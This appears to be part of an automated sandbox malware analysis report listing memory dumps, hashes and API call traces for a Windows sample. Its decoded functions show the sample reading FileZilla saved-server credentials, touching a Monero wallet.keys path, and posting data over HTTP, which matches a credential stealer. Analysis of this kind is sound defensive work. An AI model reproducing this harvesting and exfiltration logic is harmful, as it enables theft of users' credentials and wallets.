                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: z3}
                              • API String ID: 0-3258677349
                              • Opcode ID: 41718e705be0e1eb13aa0ab22f508175ffeb6168540e78e93a4e96c5faec816c
                              • Instruction ID: a10b1eabdb0463d15f0dd711f8aab75282e64c93cbdb658d9aebf8c371e5176c
                              • Opcode Fuzzy Hash: 41718e705be0e1eb13aa0ab22f508175ffeb6168540e78e93a4e96c5faec816c
                              • Instruction Fuzzy Hash: C77118F36083049BE308BE2DDC8573AF7D6EBD4720F2A8A3DDAC587744E93459058686
                              Function 00B05DF2 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 5m
                              • API String ID: 0-2377321039
                              • Opcode ID: 0a2742036822a58eafec883cd9c0186d0f83285d76991a636e24ddde4ec4233d
                              • Instruction ID: 6f468d090996484fe2f28e7f6fda122af3f6a6c3d6df864f26aa8f18127e6c98
                              • Opcode Fuzzy Hash: 0a2742036822a58eafec883cd9c0186d0f83285d76991a636e24ddde4ec4233d
                              • Instruction Fuzzy Hash: 543107F3A081105BE30CAD3DEDA677B7BC5AB94320F5A413DA586C7788E93999014286
                              Function 00C2D7C0 Relevance: .8, Instructions: 771COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7533cbdca4e9d3cf35406a1c775c99b93a5af41652cec2072aa9de5736e0eb4a
                              • Instruction ID: 867d51ca96ca142ce4d1ff3471d1795182d00636219985122eb6595a55a1ad38
                              • Opcode Fuzzy Hash: 7533cbdca4e9d3cf35406a1c775c99b93a5af41652cec2072aa9de5736e0eb4a
                              • Instruction Fuzzy Hash: 6E322DF350C204AFE708AE2DEC5577ABBE9EF94320F1A493DE6C5C7740EA3558018696
                              Function 00B2C6CF Relevance: .2, Instructions: 199COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: afb017e9c04a33753946badaab815b17043f65779ec91db7224ee54366a8f052
                              • Instruction ID: 9bb8d84b30227bfcdc24c4ad3465c3b45cfedb54cce0528a74c6a3c2367b04a8
                              • Opcode Fuzzy Hash: afb017e9c04a33753946badaab815b17043f65779ec91db7224ee54366a8f052
                              • Instruction Fuzzy Hash: 845129B3E081086FF304A969DC4577BB7D6EBD4320F1B863DEB88C3744E93A58154296
                              Function 00B3B8CC Relevance: .2, Instructions: 185COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ed413f5ff73476dc9b4c98cc78889cb0e33b0d1fb40722ec154d2fd64d687336
                              • Instruction ID: 7099128ec6744b8ff28eef7caadd065b4595abd2ae9538a635dd89800c50b0bf
                              • Opcode Fuzzy Hash: ed413f5ff73476dc9b4c98cc78889cb0e33b0d1fb40722ec154d2fd64d687336
                              • Instruction Fuzzy Hash: 955123F3A187148FE344AE2DDC85736B6D9EB98310F1A853DDAC9D37C0E93558048786
                              Function 00B7560E Relevance: .2, Instructions: 173COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a211955410d792516e1b4b9d0ba4e7872719c1ad8a43d83945cf13688daa6ba6
                              • Instruction ID: 9bafd1a85399077d736e2311585177feb489d47d764b54a8c495c615f758f714
                              • Opcode Fuzzy Hash: a211955410d792516e1b4b9d0ba4e7872719c1ad8a43d83945cf13688daa6ba6
                              • Instruction Fuzzy Hash: 2E5148F3A0C3049BE7186E2CEC9533ABAD6DB84720F1A463DDBD947780E97958158682
                              Function 00AF7624 Relevance: .1, Instructions: 146COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b969d7e382f412cdebdd3e79fe1113ed28387b7274d74bbc44bb8b4332840b53
                              • Instruction ID: aae43e59f962cb5c86d698195e41c9d1f4547603b166545af4eaf65428509745
                              • Opcode Fuzzy Hash: b969d7e382f412cdebdd3e79fe1113ed28387b7274d74bbc44bb8b4332840b53
                              • Instruction Fuzzy Hash: D741F0F3A483144BF3046E39EDC937ABAD5EB54720F1B063DEAD5837C0E97959148286
                              Function 00869750 Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              Function 00860250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 00868DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00868E0B
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0086A7E6
                                • Part of subcall function 008599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008599EC
                                • Part of subcall function 008599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00859A11
                                • Part of subcall function 008599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00859A31
                                • Part of subcall function 008599C0: ReadFile.KERNEL32(000000FF,?,00000000,0085148F,00000000), ref: 00859A5A
                                • Part of subcall function 008599C0: LocalFree.KERNEL32(0085148F), ref: 00859A90
                                • Part of subcall function 008599C0: CloseHandle.KERNEL32(000000FF), ref: 00859A9A
                                • Part of subcall function 00868E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00868E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,00870DBA,00870DB7,00870DB6,00870DB3), ref: 00860362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00860369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 00860385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00870DB2), ref: 00860393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 008603CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00870DB2), ref: 008603DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00860419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00870DB2), ref: 00860427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00860463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00870DB2), ref: 00860475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00870DB2), ref: 00860502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00870DB2), ref: 0086051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00870DB2), ref: 00860532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00870DB2), ref: 0086054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00860562
                              • lstrcat.KERNEL32(?,profile: null), ref: 00860571
                              • lstrcat.KERNEL32(?,url: ), ref: 00860580
                              • lstrcat.KERNEL32(?,00000000), ref: 00860593
                              • lstrcat.KERNEL32(?,00871678), ref: 008605A2
                              • lstrcat.KERNEL32(?,00000000), ref: 008605B5
                              • lstrcat.KERNEL32(?,0087167C), ref: 008605C4
                              • lstrcat.KERNEL32(?,login: ), ref: 008605D3
                              • lstrcat.KERNEL32(?,00000000), ref: 008605E6
                              • lstrcat.KERNEL32(?,00871688), ref: 008605F5
                              • lstrcat.KERNEL32(?,password: ), ref: 00860604
                              • lstrcat.KERNEL32(?,00000000), ref: 00860617
                              • lstrcat.KERNEL32(?,00871698), ref: 00860626
                              • lstrcat.KERNEL32(?,0087169C), ref: 00860635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00870DB2), ref: 0086068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 09491900b25b30cf9e3637ff2b751ede8545c5d1e4101bfce3b8727425062ce8
                              • Instruction ID: 287787be8deea40877715873f21710f3c52836358d7861d61e8abd5ec887c3c6
                              • Opcode Fuzzy Hash: 09491900b25b30cf9e3637ff2b751ede8545c5d1e4101bfce3b8727425062ce8
                              • Instruction Fuzzy Hash: C7D10D719102089BCB08EBE8DD96EEE7738FF24701F518519F506F6195DE34AA06CF62
                              Function 00855960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0086A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0086A7E6
                                • Part of subcall function 008547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00854839
                                • Part of subcall function 008547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00854849
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008559F8
                              • StrCmpCA.SHLWAPI(?,015CE4B0), ref: 00855A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00855B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,015CE5F0,00000000,?,015C9FC8,00000000,?,00871A1C), ref: 00855E71
                              • lstrlen.KERNEL32(00000000), ref: 00855E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00855E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00855E9A
                              • lstrlen.KERNEL32(00000000), ref: 00855EAF
                              • lstrlen.KERNEL32(00000000), ref: 00855ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00855EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 00855F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00855F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00855F4C
                              • InternetCloseHandle.WININET(00000000), ref: 00855FB0
                              • InternetCloseHandle.WININET(00000000), ref: 00855FBD
                              • HttpOpenRequestA.WININET(00000000,015CE560,?,015CDD78,00000000,00000000,00400100,00000000), ref: 00855BF8
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                              • InternetCloseHandle.WININET(00000000), ref: 00855FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
